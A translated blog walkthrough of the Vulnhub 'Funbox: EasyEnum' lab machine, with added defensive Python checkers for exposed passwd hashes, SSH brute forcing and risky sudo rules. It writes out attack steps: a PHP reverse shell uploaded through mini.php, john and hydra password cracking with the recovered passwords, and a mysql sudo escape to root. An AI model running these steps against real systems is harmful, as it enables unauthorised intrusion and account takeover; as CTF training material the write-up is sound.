Vulnhub: Funbox 7 EasyEnum machine, detailed walkthrough

Funbox 7

Author: jason_huawen

Basic information about the target machine

Name: Funbox: EasyEnum

Address: https://www.vulnhub.com/entry/funbox-easyenum,565/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.59.0/16   |   Screen View: Unique Hosts                                                                                                                                                            
                                                                                                                                                                                                                                
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                               
 192.168.56.100  08:00:27:3a:6b:ac      1      60  PCS Systemtechnik GmbH                                                                                                                                                       
 192.168.56.202  08:00:27:7f:88:17      1      60  PCS Systemtechnik GmbH          

Using netdiscover, the target host's IP address is identified as 192.168.56.202.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.202 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-21 04:20 EST
Nmap scan report for bogon (192.168.56.202)
Host is up (0.000081s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9c:52:32:5b:8b:f6:38:c7:7f:a1:b7:04:85:49:54:f3 (RSA)
|   256 d6:13:56:06:15:36:24:ad:65:5e:7a:a1:8c:e5:64:f4 (ECDSA)
|_  256 1b:a9:f3:5a:d0:51:83:18:3a:23:dd:c4:a9:be:59:f0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:7F:88:17 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds

The Nmap scan shows that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).

Get Access

Browsing to port 80 returns the default Apache page.

┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ curl http://192.168.56.202/robots.txt                      
Allow: Enum_this_Box
┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ gobuster dir --url http://192.168.56.202 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt          
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.202
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/21 04:23:36 Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.202/javascript/]
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.202/secret/]
/phpmyadmin           (Status: 301) [Size: 321] [--> http://192.168.56.202/phpmyadmin/]
/server-status        (Status: 403) [Size: 279]
Progress: 217158 / 220561 (98.46%)===============================================================
2022/11/21 04:23:59 Finished
===============================================================
                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ curl http://192.168.56.202/secret/   
根密码是用户密码的组合:harrysallygoatoraclelissy

I don't know what this password is supposed to mean (in hindsight, this piece of information is a red herring and is of no use).

However, continuing the gobuster scan of the target site with file extensions added pays off:

┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ gobuster dir --url http://192.168.56.202 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.202
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,sh,txt
[+] Timeout:                 10s
===============================================================
2022/11/21 04:25:06 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10918]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.202/javascript/]
/mini.php             (Status: 200) [Size: 4443]
/robots.txt           (Status: 200) [Size: 21]
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.202/secret/]
/phpmyadmin           (Status: 301) [Size: 321] [--> http://192.168.56.202/phpmyadmin/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1098299 / 1102805 (99.59%)===============================================================
2022/11/21 04:27:05 Finished
===============================================================
                                                                  

This identifies /mini.php, a page through which files can be uploaded. Upload shell.php and start a listener on Kali Linux:

┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ sudo nc -nlvp 5555                                         
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.202] 50714
Linux funbox7 4.15.0-117-generic #118-Ubuntu SMP Fri Sep 4 20:02:41 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 09:30:47 up 15 min,  0 users,  load average: 0.20, 1.62, 1.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@funbox7:/$ ls
ls
bin    dev   initrd.img      lib64       mnt   root  snap      sys  var
boot   etc   initrd.img.old  lost+found  opt   run   srv       tmp  vmlinuz
cdrom  home  lib             media       proc  sbin  swap.img  usr  vmlinuz.old

Successfully obtained a reverse shell from the target host.

Privilege escalation

Upload the linpeas.sh script to the /tmp directory on the target host, make it executable, and run it.

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d                                                                                                                                   
                                                                                                                                                                                                                                  
═╣ Hashes inside passwd file? ........... /etc/passwd:oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No                                                                                                                                                                                      
═╣ Can I read shadow files? ............. No                                                                                                                                                                                      
═╣ Can I read shadow plists? ............ No                                                                                                                                                                                      
═╣ Can I write shadow plists? ........... No                                                                                                                                                                                      
═╣ Can I read opasswd file? ............. No                                                                                                                                                                                      
═╣ Can I write in network-scripts? ...... No                                                                                                                                                                                      
═╣ Can I read root folder? .............. No              

The script output shows that the oracle user has a password hash stored in /etc/passwd. Download the target host's passwd file to the local Kali Linux machine, edit it so that only the oracle line remains, and then crack it with john:

┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ cat passwd 
oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt passwd     
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hiphop           (oracle)     
1g 0:00:00:00 DONE (2022-11-21 04:46) 20.00g/s 7680p/s 7680c/s 7680C/s alyssa..michael1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Successfully obtained oracle's password. Logging in over SSH as oracle does not seem to help much, though: there is no way to escalate to root from it, so let's see whether another user's shell can be obtained.
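The linpeas finding above is a classic misconfiguration: a crypt(3) hash placed in the world-readable /etc/passwd instead of /etc/shadow, in a weak md5crypt ($1$) format. The following checker is an added example (not part of the original walkthrough or of linpeas) that scans passwd-format text and reports every account whose password field is neither shadowed nor locked; the sample content and the hash value in it are constructed placeholders.

```python
# Constructed sample of /etc/passwd content. The "oracle" entry mirrors the
# misconfiguration found on the box (a crypt(3) hash stored in the password
# field instead of "x"); the hash value itself is a constructed placeholder.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
goat:x:1003:1003:,,,:/home/goat:/bin/bash
oracle:$1$PLACEHOL$aaaaaaaaaaaaaaaaaaaaaa:1004:1004:,,,:/home/oracle:/bin/bash
locked:!:1005:1005:,,,:/home/locked:/bin/bash
"""

# crypt(3) prefixes and the algorithm they denote. $1$ (md5crypt) is the one
# john identified on this box; it is fast to brute-force and considered weak.
CRYPT_PREFIXES = {
    "$1$": "md5crypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}


def find_hashes_in_passwd(text):
    """Return (user, algorithm) for every entry whose password field is exposed.

    Shadowed accounts carry "x", locked ones "*", "!" or "!!". An empty field
    means the account has no password at all; anything else is a hash that
    every local user can read and crack offline, which is what linpeas flagged.
    """
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed entry; not a passwd record
        user, pw = fields[0], fields[1]
        if pw in ("x", "*", "!", "!!"):
            continue
        if pw == "":
            findings.append((user, "empty"))
            continue
        algo = next((name for prefix, name in CRYPT_PREFIXES.items()
                     if pw.startswith(prefix)), "unknown")
        findings.append((user, algo))
    return findings


if __name__ == "__main__":
    for user, algo in find_hashes_in_passwd(SAMPLE_PASSWD):
        print(f"[!] {user}: password field exposed in /etc/passwd ({algo})")
```

Run against the real file with `find_hashes_in_passwd(open("/etc/passwd").read())`; the fix for any hit is to move the hash into /etc/shadow (for example by re-setting the password with `passwd`) and to prefer sha512crypt or yescrypt over md5crypt.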

The target host has 4 regular users in total. We already have the oracle user's shell; for the karla user, the box author hints that there is no point spending effort there; and the home directories of sally and harry contain nothing of interest. So the next goal is to get goat's shell. With the username already known, hydra can be used to crack the password, so let's try it:

┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ hydra -l goat -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.202
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-21 05:10:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.202:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344223 to do in 1358:22h, 16 active
[STATUS] 138.67 tries/min, 416 tries in 00:03h, 14343983 to do in 1724:03h, 16 active
[STATUS] 116.57 tries/min, 816 tries in 00:07h, 14343583 to do in 2050:46h, 16 active
[22][ssh] host: 192.168.56.202   login: goat   password: thebest
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-21 05:18:04
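From the defender's side, a hydra run like the one above is loud: sshd writes one "Failed password" line per guess, here from 16 parallel tasks at well over 100 tries per minute. The detector below is an added example (not part of the original post) that applies a per-source sliding window over constructed auth.log lines and reports any source exceeding a failure threshold; the log format follows the standard sshd syslog line, and the year is assumed because syslog timestamps omit it.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Standard sshd failure line; "invalid user" appears when the login name does not exist.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)


def _sample_log():
    """Constructed auth.log excerpt: 12 failures from one source within 12 s
    (what a parallel password-guessing run looks like), then a success and
    one unrelated failure from another address."""
    lines = [
        f"Nov 21 05:10:{42 + i:02d} funbox7 sshd[{1200 + i}]: Failed password "
        f"for goat from 192.168.56.137 port {41000 + i} ssh2"
        for i in range(12)
    ]
    lines.append("Nov 21 05:18:04 funbox7 sshd[1440]: Accepted password for goat "
                 "from 192.168.56.137 port 41990 ssh2")
    lines.append("Nov 21 05:20:01 funbox7 sshd[1502]: Failed password for invalid "
                 "user admin from 192.168.56.50 port 50112 ssh2")
    return "\n".join(lines)


SAMPLE_AUTH_LOG = _sample_log()


def detect_ssh_bruteforce(log_text, threshold=10, window_s=60, year=2022):
    """Return {ip: (window_start, failures)} for every source that reaches
    `threshold` failed logins inside any `window_s`-second sliding window.
    The alert is raised once, at the moment the threshold is first crossed."""
    recent = defaultdict(deque)  # ip -> timestamps of failures still in window
    alerts = {}
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = recent[m["ip"]]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()  # drop failures that fell out of the window
        if len(q) >= threshold and m["ip"] not in alerts:
            alerts[m["ip"]] = (q[0].strftime("%b %d %H:%M:%S"), len(q))
    return alerts


if __name__ == "__main__":
    for ip, (start, n) in detect_ssh_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"[!] {ip}: {n} failed SSH logins since {start}")
```

The same signal is what fail2ban's sshd jail keys on; lowering sshd's MaxAuthTries and using key-only authentication removes the password-guessing surface altogether.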

Successfully obtained goat's password, thebest. Log in over SSH as that user:

┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ ssh goat@192.168.56.202
The authenticity of host '192.168.56.202 (192.168.56.202)' can't be established.
ED25519 key fingerprint is SHA256:O6BLR8bFSyZavzqwjyqsKadofhK4GNKalxHMVbZR+5Q.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.202' (ED25519) to the list of known hosts.
goat@192.168.56.202's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-117-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Nov 21 10:18:45 UTC 2022

  System load:  0.16              Processes:             118
  Usage of /:   67.6% of 4.66GB   Users logged in:       0
  Memory usage: 58%               IP address for enp0s3: 192.168.56.202
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Sep 19 15:29:22 2020 from 192.168.178.143
goat@funbox7:~$ id
uid=1003(goat) gid=1003(goat) groups=1003(goat),111(ssh)
goat@funbox7:~$ sudo -l
Matching Defaults entries for goat on funbox7:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User goat may run the following commands on funbox7:
    (root) NOPASSWD: /usr/bin/mysql
goat@funbox7:~$ sudo mysql -e '\! /bin/sh'
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -alh
total 64K
drwx------  4 root root 4.0K Sep 19  2020 .
drwxr-xr-x 24 root root 4.0K Sep 19  2020 ..
-rw-------  1 root root  110 Sep 19  2020 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwx------  3 root root 4.0K Sep 19  2020 .gnupg
-rw-r--r--  1 root root 5.8K Sep 19  2020 html.tar.gz
-rw-------  1 root root    0 Sep 19  2020 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root 2.9K Sep 19  2020 root.flag
-rwxr-xr-x  1 root root   31 Sep 19  2020 script.sh
-rw-r--r--  1 root root   74 Sep 19  2020 .selected_editor
drwx------  2 root root 4.0K Sep 18  2020 .ssh
-rw-------  1 root root 9.9K Sep 19  2020 .viminfo
-rw-r--r--  1 root root  165 Sep 19  2020 .wget-hsts
# cat root.flag
  █████▒ █    ██  ███▄    █  ▄▄▄▄    ▒█████  ▒██   ██▒                   
▓██   ▒  ██  ▓██▒ ██ ▀█   █ ▓█████▄ ▒██▒  ██▒▒▒ █ █ ▒░                   
▒████ ░ ▓██  ▒██░▓██  ▀█ ██▒▒██▒ ▄██▒██░  ██▒░░  █   ░                   
░▓█▒  ░ ▓▓█  ░██░▓██▒  ▐▌██▒▒██░█▀  ▒██   ██░ ░ █ █ ▒                    
░▒█░    ▒▒█████▓ ▒██░   ▓██░░▓█  ▀█▓░ ████▓▒░▒██▒ ▒██▒                   
 ▒ ░    ░▒▓▒ ▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░ ▒░▒░▒░ ▒▒ ░ ░▓ ░                   
 ░      ░░▒░ ░ ░ ░ ░░   ░ ▒░▒░▒   ░   ░ ▒ ▒░ ░░   ░▒ ░                   
 ░ ░     ░░░ ░ ░    ░   ░ ░  ░    ░ ░ ░ ░ ▒   ░    ░                     
           ░              ░  ░          ░ ░   ░    ░                     
                                  ░                                      
▓█████  ▄▄▄        ██████ ▓██   ██▓▓█████  ███▄    █  █    ██  ███▄ ▄███▓
▓█   ▀ ▒████▄    ▒██    ▒  ▒██  ██▒▓█   ▀  ██ ▀█   █  ██  ▓██▒▓██▒▀█▀ ██▒
▒███   ▒██  ▀█▄  ░ ▓██▄     ▒██ ██░▒███   ▓██  ▀█ ██▒▓██  ▒██░▓██    ▓██░
▒▓█  ▄ ░██▄▄▄▄██   ▒   ██▒  ░ ▐██▓░▒▓█  ▄ ▓██▒  ▐▌██▒▓▓█  ░██░▒██    ▒██ 
░▒████▒ ▓█   ▓██▒▒██████▒▒  ░ ██▒▓░░▒████▒▒██░   ▓██░▒▒█████▓ ▒██▒   ░██▒
░░ ▒░ ░ ▒▒   ▓▒█░▒ ▒▓▒ ▒ ░   ██▒▒▒ ░░ ▒░ ░░ ▒░   ▒ ▒ ░▒▓▒ ▒ ▒ ░ ▒░   ░  ░
 ░ ░  ░  ▒   ▒▒ ░░ ░▒  ░ ░ ▓██ ░▒░  ░ ░  ░░ ░░   ░ ▒░░░▒░ ░ ░ ░  ░      ░
   ░     ░   ▒   ░  ░  ░   ▒ ▒ ░░     ░      ░   ░ ░  ░░░ ░ ░ ░      ░   
   ░  ░      ░  ░      ░   ░ ░        ░  ░         ░    ░            ░   
                           ░ ░                                           
                                                                         
...solved ! 

Please, tweet this screenshot to @0815R2d2. Many thanks in advance.
# 

After logging in, `sudo -l` shows that privileges can be escalated through mysql. Following the method documented on the GTFOBins site, a root shell is obtained!
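The root cause here is the sudoers rule `(root) NOPASSWD: /usr/bin/mysql`: the mysql client can run host commands with its `\!` escape, so granting it as root with no password and no argument restriction is equivalent to granting a root shell. The auditor below is an added example (not part of the original post) that parses `sudo -l` output in the format shown above and flags the three weaknesses of such a rule; the sample output is constructed from the rule on this box plus one benign rule, and the SHELL_CAPABLE set is deliberately limited to the binary this box is built around.

```python
import re

# Constructed `sudo -l` output: the rule found on the box plus a benign,
# argument-restricted rule for comparison.
SAMPLE_SUDO_L = r"""Matching Defaults entries for goat on funbox7:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User goat may run the following commands on funbox7:
    (root) NOPASSWD: /usr/bin/mysql
    (root) /usr/bin/apt-get update
"""

# "(runas) TAG: TAG: /path/to/binary optional args"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)(?P<args>.*)$"
)

# Binaries that hand the caller a shell or run arbitrary commands once started
# with elevated rights. mysql is the one this box abuses (the client's \! escape);
# extend the set from GTFOBins for a real audit.
SHELL_CAPABLE = {"mysql"}


def audit_sudo_rules(sudo_l_output, user):
    """Return [(command, runas, [issues])] for every risky rule granted to `user`."""
    findings = []
    in_rules = False
    for line in sudo_l_output.splitlines():
        if line.startswith(f"User {user} may run"):
            in_rules = True  # rules follow this header, one per line
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmd, runas = m["cmd"], m["runas"].strip()
        issues = []
        if "NOPASSWD:" in m["tags"]:
            issues.append("no password required")
        if cmd.rsplit("/", 1)[-1] in SHELL_CAPABLE:
            issues.append(f"binary can spawn a shell as {runas}")
        if not m["args"].strip():
            issues.append("arguments unrestricted")
        if issues:
            findings.append((cmd, runas, issues))
    return findings


if __name__ == "__main__":
    for cmd, runas, issues in audit_sudo_rules(SAMPLE_SUDO_L, "goat"):
        print(f"[!] {cmd} as {runas}: " + "; ".join(issues))
```

On a live host feed it the output of `sudo -l -U <user>` run as root; a rule that trips all three checks should be removed or narrowed to a fixed, non-interactive command line.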

posted @ 2022-11-21 18:35  Jason_huawen